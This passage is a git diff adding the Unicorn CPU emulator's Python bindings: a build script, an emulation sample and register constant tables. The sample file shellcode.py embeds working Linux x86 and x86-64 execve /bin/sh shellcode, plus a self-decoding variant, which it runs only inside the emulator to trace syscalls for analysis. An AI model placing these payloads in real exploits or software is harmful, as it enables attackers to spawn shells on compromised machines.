b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg @@ -0,0 +1,2 @@ +[bdist_wheel] +universal=1 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py new file mode 100644 index 0000000..836dab8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py @@ -0,0 +1,291 @@ +#!/usr/bin/env python +# Python binding for Unicorn 
engine. Nguyen Anh Quynh <aquynh@gmail.com> + +from __future__ import print_function +import glob +import os +import subprocess +import shutil +import sys +import platform + +from distutils import log +from distutils.core import setup +from distutils.util import get_platform +from distutils.command.build import build +from distutils.command.sdist import sdist +from setuptools.command.bdist_egg import bdist_egg +from setuptools.command.develop import develop + +SYSTEM = sys.platform + +# sys.maxint is 2**31 - 1 on both 32 and 64 bit mingw +IS_64BITS = platform.architecture()[0] == '64bit' + +# are we building from the repository or from a source distribution? +ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) +LIBS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'lib') +HEADERS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'include') +SRC_DIR = os.path.join(ROOT_DIR, 'src') +BUILD_DIR = SRC_DIR if os.path.exists(SRC_DIR) else os.path.join(ROOT_DIR, '../..') + +# Parse version from pkgconfig.mk +VERSION_DATA = {} +with open(os.path.join(BUILD_DIR, 'pkgconfig.mk')) as fp: + lines = fp.readlines() + for line in lines: + line = line.strip() + if len(line) == 0: + continue + if line.startswith('#'): + continue + if '=' not in line: + continue + + k, v = line.split('=', 1) + k = k.strip() + v = v.strip() + if len(k) == 0 or len(v) == 0: + continue + VERSION_DATA[k] = v + +if 'PKG_MAJOR' not in VERSION_DATA or \ + 'PKG_MINOR' not in VERSION_DATA or \ + 'PKG_EXTRA' not in VERSION_DATA: + raise Exception("Malformed pkgconfig.mk") + +if 'PKG_TAG' in VERSION_DATA: + VERSION = '{PKG_MAJOR}.{PKG_MINOR}.{PKG_EXTRA}.{PKG_TAG}'.format(**VERSION_DATA) +else: + VERSION = '{PKG_MAJOR}.{PKG_MINOR}.{PKG_EXTRA}'.format(**VERSION_DATA) + +if SYSTEM == 'darwin': + LIBRARY_FILE = "libunicorn.dylib" + MAC_LIBRARY_FILE = "libunicorn*.dylib" + STATIC_LIBRARY_FILE = None +elif SYSTEM == 'win32': + LIBRARY_FILE = "unicorn.dll" + STATIC_LIBRARY_FILE = "unicorn.lib" +elif SYSTEM == 'cygwin': + LIBRARY_FILE 
= "cygunicorn.dll" + STATIC_LIBRARY_FILE = None +else: + LIBRARY_FILE = "libunicorn.so" + STATIC_LIBRARY_FILE = None + +def clean_bins(): + shutil.rmtree(LIBS_DIR, ignore_errors=True) + shutil.rmtree(HEADERS_DIR, ignore_errors=True) + +def copy_sources(): + """Copy the C sources into the source directory. + This rearranges the source files under the python distribution + directory. + """ + src = [] + + os.system('make -C %s clean' % os.path.join(ROOT_DIR, '../..')) + shutil.rmtree(SRC_DIR, ignore_errors=True) + os.mkdir(SRC_DIR) + + shutil.copytree(os.path.join(ROOT_DIR, '../../qemu'), os.path.join(SRC_DIR, 'qemu/')) + shutil.copytree(os.path.join(ROOT_DIR, '../../msvc'), os.path.join(SRC_DIR, 'msvc/')) + shutil.copytree(os.path.join(ROOT_DIR, '../../include'), os.path.join(SRC_DIR, 'include/')) + # make -> configure -> clean -> clean tests fails unless tests is present + shutil.copytree(os.path.join(ROOT_DIR, '../../tests'), os.path.join(SRC_DIR, 'tests/')) + try: + # remove site-specific configuration file + # might not exist + os.remove(os.path.join(SRC_DIR, 'qemu/config-host.mak')) + except OSError: + pass + + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.[ch]"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.mk"))) + + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../Makefile"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../LICENSE*"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../README.md"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.TXT"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../RELEASE_NOTES"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../make.sh"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../CMakeLists.txt"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../pkgconfig.mk"))) + + for filename in src: + outpath = os.path.join(SRC_DIR, os.path.basename(filename)) + log.info("%s -> %s" % (filename, outpath)) + shutil.copy(filename, outpath) + +def build_libraries(): + """ + 
Prepare the unicorn directory for a binary distribution or installation. + Builds shared libraries and copies header files. + + Will use a src/ dir if one exists in the current directory, otherwise assumes it's in the repo + """ + cwd = os.getcwd() + clean_bins() + os.mkdir(HEADERS_DIR) + os.mkdir(LIBS_DIR) + + # copy public headers + shutil.copytree(os.path.join(BUILD_DIR, 'include', 'unicorn'), os.path.join(HEADERS_DIR, 'unicorn')) + + # check if a prebuilt library exists + # if so, use it instead of building + if os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE)): + shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE), LIBS_DIR) + if STATIC_LIBRARY_FILE is not None and os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE)): + shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE), LIBS_DIR) + return + + # otherwise, build!! + os.chdir(BUILD_DIR) + + try: + subprocess.check_call(['msbuild', '-ver']) + except: + has_msbuild = False + else: + has_msbuild = True + + if has_msbuild and SYSTEM == 'win32': + if platform.architecture()[0] == '32bit': + plat = 'Win32' + elif 'win32' in sys.argv: + plat = 'Win32' + else: + plat = 'x64' + + conf = 'Debug' if os.getenv('DEBUG', '') else 'Release' + subprocess.call(['msbuild', 'unicorn.sln', '-m', '-p:Platform=' + plat, '-p:Configuration=' + conf], cwd=os.path.join(BUILD_DIR, 'msvc')) + + obj_dir = os.path.join(BUILD_DIR, 'msvc', plat, conf) + shutil.copy(os.path.join(obj_dir, LIBRARY_FILE), LIBS_DIR) + shutil.copy(os.path.join(obj_dir, STATIC_LIBRARY_FILE), LIBS_DIR) + else: + # platform description refs at https://docs.python.org/2/library/sys.html#sys.platform + new_env = dict(os.environ) + new_env['UNICORN_BUILD_CORE_ONLY'] = 'yes' + cmd = ['sh', './make.sh'] + if SYSTEM == "win32": + if IS_64BITS: + cmd.append('cross-win64') + else: + cmd.append('cross-win32') + + subprocess.call(cmd, env=new_env) + + if SYSTEM == 'darwin': + for file in glob.glob(MAC_LIBRARY_FILE): + 
try: + shutil.copy(file, LIBS_DIR, follow_symlinks=False) + except: + shutil.copy(file, LIBS_DIR) + else: + shutil.copy(LIBRARY_FILE, LIBS_DIR) + try: + # static library may fail to build on windows if user doesn't have visual studio installed. this is fine. + if STATIC_LIBRARY_FILE is not None: + shutil.copy(STATIC_LIBRARY_FILE, LIBS_DIR) + except: + print('Warning: Could not build static library file! This build is not appropriate for a binary distribution') + # enforce this + if 'upload' in sys.argv: + sys.exit(1) + os.chdir(cwd) + +class custom_sdist(sdist): + def run(self): + clean_bins() + copy_sources() + return sdist.run(self) + +class custom_build(build): + def run(self): + if 'LIBUNICORN_PATH' in os.environ: + log.info("Skipping building C extensions since LIBUNICORN_PATH is set") + else: + log.info("Building C extensions") + build_libraries() + return build.run(self) + +class custom_develop(develop): + def run(self): + log.info("Building C extensions") + build_libraries() + return develop.run(self) + +class custom_bdist_egg(bdist_egg): + def run(self): + self.run_command('build') + return bdist_egg.run(self) + +def dummy_src(): + return [] + + +if 'bdist_wheel' in sys.argv and '--plat-name' not in sys.argv: + idx = sys.argv.index('bdist_wheel') + 1 + sys.argv.insert(idx, '--plat-name') + name = get_platform() + if 'linux' in name: + # linux_* platform tags are disallowed because the python ecosystem is fubar + # linux builds should be built in the centos 5 vm for maximum compatibility + # see https://github.com/pypa/manylinux + # see also https://github.com/angr/angr-dev/blob/master/bdist.sh + sys.argv.insert(idx + 1, 'manylinux1_' + platform.machine()) + elif 'mingw' in name: + if IS_64BITS: + sys.argv.insert(idx + 1, 'win_amd64') + else: + sys.argv.insert(idx + 1, 'win32') + else: + # https://www.python.org/dev/peps/pep-0425/ + sys.argv.insert(idx + 1, name.replace('.', '_').replace('-', '_')) + + +long_desc = ''' +Unicorn is a lightweight, 
multi-platform, multi-architecture CPU emulator framework +based on [QEMU](https://qemu.org). + +Unicorn offers some unparalleled features: + +- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, SPARC, and X86 (16, 32, 64-bit) +- Clean/simple/lightweight/intuitive architecture-neutral API +- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua. +- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed) +- High performance via Just-In-Time compilation +- Support for fine-grained instrumentation at various levels +- Thread-safety by design +- Distributed under free software license GPLv2 + +Further information is available at https://www.unicorn-engine.org +''' + +setup( + provides=['unicorn'], + packages=['unicorn'], + name='unicorn', + version=VERSION, + author='Nguyen Anh Quynh', + author_email='aquynh@gmail.com', + description='Unicorn CPU emulator engine', + long_description=long_desc, + long_description_content_type="text/markdown", + url='https://www.unicorn-engine.org', + classifiers=[ + 'License :: OSI Approved :: BSD License', + 'Programming Language :: Python :: 2', + 'Programming Language :: Python :: 3', + ], + requires=['ctypes'], + cmdclass={'build': custom_build, 'develop': custom_develop, 'sdist': custom_sdist, 'bdist_egg': custom_bdist_egg}, + zip_safe=False, + include_package_data=True, + is_pure=False, + package_data={ + 'unicorn': ['lib/*', 'include/unicorn/*'] + } +) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py new file mode 100644 index 0000000..3c63e90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py @@ -0,0 +1,179 @@ +#!/usr/bin/env python +# Sample code for X86 of Unicorn. 
+# Nguyen Anh Quynh <aquynh@gmail.com> +# KaiJern Lau <kj@theshepherdlab.io> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +# Original shellcode from this example. +#X86_CODE32 = b"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f" + +# Linux/x86 execve /bin/sh shellcode 23 bytes, from http://shell-storm.org/shellcode/files/shellcode-827.php +# 0: 31 c0 xor eax,eax +# 2: 50 push eax +# 3: 68 2f 2f 73 68 push 0x68732f2f +# 8: 68 2f 62 69 6e push 0x6e69622f +# d: 89 e3 mov ebx,esp +# f: 50 push eax +# 10: 53 push ebx +# 11: 89 e1 mov ecx,esp +# 13: b0 0b mov al,0xb +# 15: cd 80 int 0x80 +X86_CODE32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" +X86_CODE32_SELF = b"\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41" + +# Linux/x86 64bit execve /bin/sh shellcode +# 0: 48 31 ff xor rdi,rdi +# 3: 57 push rdi +# 4: 57 push rdi +# 5: 5e pop rsi +# 6: 5a pop rdx +# 7: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f +# e: 2f 73 68 +# 11: 48 c1 ef 08 shr rdi,0x8 +# 15: 57 push rdi +# 16: 54 push rsp +# 17: 5f pop rdi +# 18: 6a 3b push 0x3b +# 1a: 58 pop rax +# 1b: 0f 05 syscall +X86_CODE64 = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + +# memory address where emulation starts +ADDRESS = 0x1000000 + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + # read this instruction code from memory + tmp = uc.mem_read(address, size) + print("*** PC = %x *** :" %(address), 
end="") + for i in tmp: + print(" %02x" %i, end="") + print("") + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + +def read_string(uc, address): + ret = "" + c = uc.mem_read(address, 1)[0] + read_bytes = 1 + + while c != 0x0: + ret += chr(c) + c = uc.mem_read(address + read_bytes, 1)[0] + read_bytes += 1 + return ret + +# callback for tracing Linux interrupt +def hook_intr(uc, intno, user_data): + # only handle Linux syscall + if intno != 0x80: + print("got interrupt %x ???" %intno); + uc.emu_stop() + return + + eax = uc.reg_read(UC_X86_REG_EAX) + eip = uc.reg_read(UC_X86_REG_EIP) + + if eax == 1: # sys_exit + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) + uc.emu_stop() + elif eax == 4: # sys_write + # ECX = buffer address + ecx = uc.reg_read(UC_X86_REG_ECX) + # EDX = buffer size + edx = uc.reg_read(UC_X86_REG_EDX) + try: + buf = uc.mem_read(ecx, edx) + print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = " \ + %(eip, intno, ecx, edx), end="") + for i in buf: + print("%c" %i, end="") + print("") + except UcError as e: + print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. 
buffer = 0x%x, size = %u, content = <unknown>\n" \ + %(eip, intno, ecx, edx)) + elif eax == 11: # sys_write + ebx = uc.reg_read(UC_X86_REG_EBX) + filename = read_string(uc, ebx) + print(">>> SYS_EXECV filename=%s" % filename) + else: + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) + + +def hook_syscall32(mu, user_data): + eax = mu.reg_read(UC_X86_REG_EAX) + print(">>> got SYSCALL with EAX = 0x%x" %(eax)) + mu.emu_stop() + +def hook_syscall64(mu, user_data): + rax = mu.reg_read(UC_X86_REG_RAX) + rdi = mu.reg_read(UC_X86_REG_RDI) + + print(">>> got SYSCALL with RAX = %d" %(rax)) + + if rax == 59: #sys_execve + filename = read_string(mu, rdi) + print(">>> SYS_EXECV filename=%s" % filename) + + else: + rip = mu.reg_read(UC_X86_REG_RIP) + print(">>> Syscall Found at 0x%x: , RAX = 0x%x" %(rip, rax)) + + mu.emu_stop() + +# Test X86 32 bit +def test_i386(mode, code): + if mode == UC_MODE_32: + print("Emulate x86_32 code") + elif mode == UC_MODE_64: + print("Emulate x86_64 code") + + try: + # Initialize emulator + mu = Uc(UC_ARCH_X86, mode) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, code) + + # initialize stack + mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + if mode == UC_MODE_32: + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + # handle SYSCALL + mu.hook_add(UC_HOOK_INSN, hook_syscall32, None, 1, 0, UC_X86_INS_SYSCALL) + elif mode == UC_MODE_64: + mu.hook_add(UC_HOOK_INSN, hook_syscall64, None, 1, 0, UC_X86_INS_SYSCALL) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done") + + except UcError as e: + print("ERROR: %s" % e) + +if 
__name__ == '__main__': + test_i386(UC_MODE_32, X86_CODE32_SELF) + print("=" * 20) + test_i386(UC_MODE_32, X86_CODE32) + print("=" * 20) + test_i386(UC_MODE_64, X86_CODE64) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py new file mode 100644 index 0000000..9d2b717 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py @@ -0,0 +1,4 @@ +# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com> +from . import arm_const, arm64_const, mips_const, sparc_const, m68k_const, x86_const +from .unicorn_const import * +from .unicorn import Uc, uc_version, uc_arch_supported, version_bind, debug, UcError, __version__ diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py new file mode 100644 index 0000000..ae8e77e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py @@ -0,0 +1,311 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.py] + +# ARM64 registers + +UC_ARM64_REG_INVALID = 0 +UC_ARM64_REG_X29 = 1 +UC_ARM64_REG_X30 = 2 +UC_ARM64_REG_NZCV = 3 +UC_ARM64_REG_SP = 4 +UC_ARM64_REG_WSP = 5 +UC_ARM64_REG_WZR = 6 +UC_ARM64_REG_XZR = 7 +UC_ARM64_REG_B0 = 8 +UC_ARM64_REG_B1 = 9 +UC_ARM64_REG_B2 = 10 +UC_ARM64_REG_B3 = 11 +UC_ARM64_REG_B4 = 12 +UC_ARM64_REG_B5 = 13 +UC_ARM64_REG_B6 = 14 +UC_ARM64_REG_B7 = 15 +UC_ARM64_REG_B8 = 16 +UC_ARM64_REG_B9 = 17 +UC_ARM64_REG_B10 = 18 +UC_ARM64_REG_B11 = 19 +UC_ARM64_REG_B12 = 20 +UC_ARM64_REG_B13 = 21 +UC_ARM64_REG_B14 = 22 +UC_ARM64_REG_B15 = 23 +UC_ARM64_REG_B16 = 24 +UC_ARM64_REG_B17 = 25 +UC_ARM64_REG_B18 = 26 +UC_ARM64_REG_B19 = 27 +UC_ARM64_REG_B20 = 28 +UC_ARM64_REG_B21 = 29 +UC_ARM64_REG_B22 = 30 +UC_ARM64_REG_B23 = 31 +UC_ARM64_REG_B24 = 32 +UC_ARM64_REG_B25 = 33 +UC_ARM64_REG_B26 = 34 +UC_ARM64_REG_B27 = 35 +UC_ARM64_REG_B28 = 36 +UC_ARM64_REG_B29 = 37 +UC_ARM64_REG_B30 = 38 +UC_ARM64_REG_B31 = 39 +UC_ARM64_REG_D0 = 40 +UC_ARM64_REG_D1 = 41 +UC_ARM64_REG_D2 = 42 +UC_ARM64_REG_D3 = 43 +UC_ARM64_REG_D4 = 44 +UC_ARM64_REG_D5 = 45 +UC_ARM64_REG_D6 = 46 +UC_ARM64_REG_D7 = 47 +UC_ARM64_REG_D8 = 48 +UC_ARM64_REG_D9 = 49 +UC_ARM64_REG_D10 = 50 +UC_ARM64_REG_D11 = 51 +UC_ARM64_REG_D12 = 52 +UC_ARM64_REG_D13 = 53 +UC_ARM64_REG_D14 = 54 +UC_ARM64_REG_D15 = 55 +UC_ARM64_REG_D16 = 56 +UC_ARM64_REG_D17 = 57 +UC_ARM64_REG_D18 = 58 +UC_ARM64_REG_D19 = 59 +UC_ARM64_REG_D20 = 60 +UC_ARM64_REG_D21 = 61 +UC_ARM64_REG_D22 = 62 +UC_ARM64_REG_D23 = 63 +UC_ARM64_REG_D24 = 64 +UC_ARM64_REG_D25 = 65 +UC_ARM64_REG_D26 = 66 +UC_ARM64_REG_D27 = 67 +UC_ARM64_REG_D28 = 68 +UC_ARM64_REG_D29 = 69 +UC_ARM64_REG_D30 = 70 +UC_ARM64_REG_D31 = 71 +UC_ARM64_REG_H0 = 72 +UC_ARM64_REG_H1 = 73 +UC_ARM64_REG_H2 = 74 +UC_ARM64_REG_H3 = 75 +UC_ARM64_REG_H4 = 76 +UC_ARM64_REG_H5 = 77 +UC_ARM64_REG_H6 = 78 +UC_ARM64_REG_H7 = 79 +UC_ARM64_REG_H8 = 80 +UC_ARM64_REG_H9 = 81 +UC_ARM64_REG_H10 = 82 +UC_ARM64_REG_H11 = 83 +UC_ARM64_REG_H12 = 84 
+UC_ARM64_REG_H13 = 85 +UC_ARM64_REG_H14 = 86 +UC_ARM64_REG_H15 = 87 +UC_ARM64_REG_H16 = 88 +UC_ARM64_REG_H17 = 89 +UC_ARM64_REG_H18 = 90 +UC_ARM64_REG_H19 = 91 +UC_ARM64_REG_H20 = 92 +UC_ARM64_REG_H21 = 93 +UC_ARM64_REG_H22 = 94 +UC_ARM64_REG_H23 = 95 +UC_ARM64_REG_H24 = 96 +UC_ARM64_REG_H25 = 97 +UC_ARM64_REG_H26 = 98 +UC_ARM64_REG_H27 = 99 +UC_ARM64_REG_H28 = 100 +UC_ARM64_REG_H29 = 101 +UC_ARM64_REG_H30 = 102 +UC_ARM64_REG_H31 = 103 +UC_ARM64_REG_Q0 = 104 +UC_ARM64_REG_Q1 = 105 +UC_ARM64_REG_Q2 = 106 +UC_ARM64_REG_Q3 = 107 +UC_ARM64_REG_Q4 = 108 +UC_ARM64_REG_Q5 = 109 +UC_ARM64_REG_Q6 = 110 +UC_ARM64_REG_Q7 = 111 +UC_ARM64_REG_Q8 = 112 +UC_ARM64_REG_Q9 = 113 +UC_ARM64_REG_Q10 = 114 +UC_ARM64_REG_Q11 = 115 +UC_ARM64_REG_Q12 = 116 +UC_ARM64_REG_Q13 = 117 +UC_ARM64_REG_Q14 = 118 +UC_ARM64_REG_Q15 = 119 +UC_ARM64_REG_Q16 = 120 +UC_ARM64_REG_Q17 = 121 +UC_ARM64_REG_Q18 = 122 +UC_ARM64_REG_Q19 = 123 +UC_ARM64_REG_Q20 = 124 +UC_ARM64_REG_Q21 = 125 +UC_ARM64_REG_Q22 = 126 +UC_ARM64_REG_Q23 = 127 +UC_ARM64_REG_Q24 = 128 +UC_ARM64_REG_Q25 = 129 +UC_ARM64_REG_Q26 = 130 +UC_ARM64_REG_Q27 = 131 +UC_ARM64_REG_Q28 = 132 +UC_ARM64_REG_Q29 = 133 +UC_ARM64_REG_Q30 = 134 +UC_ARM64_REG_Q31 = 135 +UC_ARM64_REG_S0 = 136 +UC_ARM64_REG_S1 = 137 +UC_ARM64_REG_S2 = 138 +UC_ARM64_REG_S3 = 139 +UC_ARM64_REG_S4 = 140 +UC_ARM64_REG_S5 = 141 +UC_ARM64_REG_S6 = 142 +UC_ARM64_REG_S7 = 143 +UC_ARM64_REG_S8 = 144 +UC_ARM64_REG_S9 = 145 +UC_ARM64_REG_S10 = 146 +UC_ARM64_REG_S11 = 147 +UC_ARM64_REG_S12 = 148 +UC_ARM64_REG_S13 = 149 +UC_ARM64_REG_S14 = 150 +UC_ARM64_REG_S15 = 151 +UC_ARM64_REG_S16 = 152 +UC_ARM64_REG_S17 = 153 +UC_ARM64_REG_S18 = 154 +UC_ARM64_REG_S19 = 155 +UC_ARM64_REG_S20 = 156 +UC_ARM64_REG_S21 = 157 +UC_ARM64_REG_S22 = 158 +UC_ARM64_REG_S23 = 159 +UC_ARM64_REG_S24 = 160 +UC_ARM64_REG_S25 = 161 +UC_ARM64_REG_S26 = 162 +UC_ARM64_REG_S27 = 163 +UC_ARM64_REG_S28 = 164 +UC_ARM64_REG_S29 = 165 +UC_ARM64_REG_S30 = 166 +UC_ARM64_REG_S31 = 167 +UC_ARM64_REG_W0 = 168 +UC_ARM64_REG_W1 = 
169 +UC_ARM64_REG_W2 = 170 +UC_ARM64_REG_W3 = 171 +UC_ARM64_REG_W4 = 172 +UC_ARM64_REG_W5 = 173 +UC_ARM64_REG_W6 = 174 +UC_ARM64_REG_W7 = 175 +UC_ARM64_REG_W8 = 176 +UC_ARM64_REG_W9 = 177 +UC_ARM64_REG_W10 = 178 +UC_ARM64_REG_W11 = 179 +UC_ARM64_REG_W12 = 180 +UC_ARM64_REG_W13 = 181 +UC_ARM64_REG_W14 = 182 +UC_ARM64_REG_W15 = 183 +UC_ARM64_REG_W16 = 184 +UC_ARM64_REG_W17 = 185 +UC_ARM64_REG_W18 = 186 +UC_ARM64_REG_W19 = 187 +UC_ARM64_REG_W20 = 188 +UC_ARM64_REG_W21 = 189 +UC_ARM64_REG_W22 = 190 +UC_ARM64_REG_W23 = 191 +UC_ARM64_REG_W24 = 192 +UC_ARM64_REG_W25 = 193 +UC_ARM64_REG_W26 = 194 +UC_ARM64_REG_W27 = 195 +UC_ARM64_REG_W28 = 196 +UC_ARM64_REG_W29 = 197 +UC_ARM64_REG_W30 = 198 +UC_ARM64_REG_X0 = 199 +UC_ARM64_REG_X1 = 200 +UC_ARM64_REG_X2 = 201 +UC_ARM64_REG_X3 = 202 +UC_ARM64_REG_X4 = 203 +UC_ARM64_REG_X5 = 204 +UC_ARM64_REG_X6 = 205 +UC_ARM64_REG_X7 = 206 +UC_ARM64_REG_X8 = 207 +UC_ARM64_REG_X9 = 208 +UC_ARM64_REG_X10 = 209 +UC_ARM64_REG_X11 = 210 +UC_ARM64_REG_X12 = 211 +UC_ARM64_REG_X13 = 212 +UC_ARM64_REG_X14 = 213 +UC_ARM64_REG_X15 = 214 +UC_ARM64_REG_X16 = 215 +UC_ARM64_REG_X17 = 216 +UC_ARM64_REG_X18 = 217 +UC_ARM64_REG_X19 = 218 +UC_ARM64_REG_X20 = 219 +UC_ARM64_REG_X21 = 220 +UC_ARM64_REG_X22 = 221 +UC_ARM64_REG_X23 = 222 +UC_ARM64_REG_X24 = 223 +UC_ARM64_REG_X25 = 224 +UC_ARM64_REG_X26 = 225 +UC_ARM64_REG_X27 = 226 +UC_ARM64_REG_X28 = 227 +UC_ARM64_REG_V0 = 228 +UC_ARM64_REG_V1 = 229 +UC_ARM64_REG_V2 = 230 +UC_ARM64_REG_V3 = 231 +UC_ARM64_REG_V4 = 232 +UC_ARM64_REG_V5 = 233 +UC_ARM64_REG_V6 = 234 +UC_ARM64_REG_V7 = 235 +UC_ARM64_REG_V8 = 236 +UC_ARM64_REG_V9 = 237 +UC_ARM64_REG_V10 = 238 +UC_ARM64_REG_V11 = 239 +UC_ARM64_REG_V12 = 240 +UC_ARM64_REG_V13 = 241 +UC_ARM64_REG_V14 = 242 +UC_ARM64_REG_V15 = 243 +UC_ARM64_REG_V16 = 244 +UC_ARM64_REG_V17 = 245 +UC_ARM64_REG_V18 = 246 +UC_ARM64_REG_V19 = 247 +UC_ARM64_REG_V20 = 248 +UC_ARM64_REG_V21 = 249 +UC_ARM64_REG_V22 = 250 +UC_ARM64_REG_V23 = 251 +UC_ARM64_REG_V24 = 252 +UC_ARM64_REG_V25 = 253 
+UC_ARM64_REG_V26 = 254 +UC_ARM64_REG_V27 = 255 +UC_ARM64_REG_V28 = 256 +UC_ARM64_REG_V29 = 257 +UC_ARM64_REG_V30 = 258 +UC_ARM64_REG_V31 = 259 + +# pseudo registers +UC_ARM64_REG_PC = 260 +UC_ARM64_REG_CPACR_EL1 = 261 + +# thread registers +UC_ARM64_REG_TPIDR_EL0 = 262 +UC_ARM64_REG_TPIDRRO_EL0 = 263 +UC_ARM64_REG_TPIDR_EL1 = 264 +UC_ARM64_REG_PSTATE = 265 + +# exception link registers +UC_ARM64_REG_ELR_EL0 = 266 +UC_ARM64_REG_ELR_EL1 = 267 +UC_ARM64_REG_ELR_EL2 = 268 +UC_ARM64_REG_ELR_EL3 = 269 + +# stack pointers registers +UC_ARM64_REG_SP_EL0 = 270 +UC_ARM64_REG_SP_EL1 = 271 +UC_ARM64_REG_SP_EL2 = 272 +UC_ARM64_REG_SP_EL3 = 273 + +# other CP15 registers +UC_ARM64_REG_TTBR0_EL1 = 274 +UC_ARM64_REG_TTBR1_EL1 = 275 +UC_ARM64_REG_ESR_EL0 = 276 +UC_ARM64_REG_ESR_EL1 = 277 +UC_ARM64_REG_ESR_EL2 = 278 +UC_ARM64_REG_ESR_EL3 = 279 +UC_ARM64_REG_FAR_EL0 = 280 +UC_ARM64_REG_FAR_EL1 = 281 +UC_ARM64_REG_FAR_EL2 = 282 +UC_ARM64_REG_FAR_EL3 = 283 +UC_ARM64_REG_PAR_EL1 = 284 +UC_ARM64_REG_MAIR_EL1 = 285 +UC_ARM64_REG_VBAR_EL0 = 286 +UC_ARM64_REG_VBAR_EL1 = 287 +UC_ARM64_REG_VBAR_EL2 = 288 +UC_ARM64_REG_VBAR_EL3 = 289 +UC_ARM64_REG_ENDING = 290 + +# alias registers +UC_ARM64_REG_IP0 = 215 +UC_ARM64_REG_IP1 = 216 +UC_ARM64_REG_FP = 1 +UC_ARM64_REG_LR = 2 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py new file mode 100644 index 0000000..088eaa4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py @@ -0,0 +1,132 @@ +# For Unicorn Engine. 
